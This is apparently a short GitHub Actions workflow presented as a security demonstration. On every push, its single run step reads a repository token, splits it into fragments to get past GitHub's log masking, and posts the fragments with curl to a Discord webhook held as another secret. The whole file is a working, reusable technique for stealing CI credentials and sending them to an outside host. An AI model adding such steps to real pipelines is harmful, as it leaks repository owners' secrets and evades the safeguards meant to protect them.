name: Security demostration
on: [push]

jobs:
  exfiltracion:
    runs-on: ubuntu-latest
    steps:
      - name: Attempted extraction
        env:
          # Secrets as environment variables
          MY_SECRET: ${{ secrets.SUPER_TOKEN }}
          WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
        run: |
          echo "If I try to print the entire secret: $MY_SECRET"
          
          # But if we break down the chain
          PARTE1=$(echo $MY_SECRET | cut -c 1-5)
          PARTE2=$(echo $MY_SECRET | cut -c 6-10)
          PARTE3=$(echo $MY_SECRET | cut -c 11-20)
          
          # I send the content to Discord using curl.
          curl -H "Content-Type: application/json" \
               -X POST \
               -d "{\"content\": \"Secret extracted in parts: $PARTE1 - $PARTE2 - $PARTE3\"}" \
               $WEBHOOK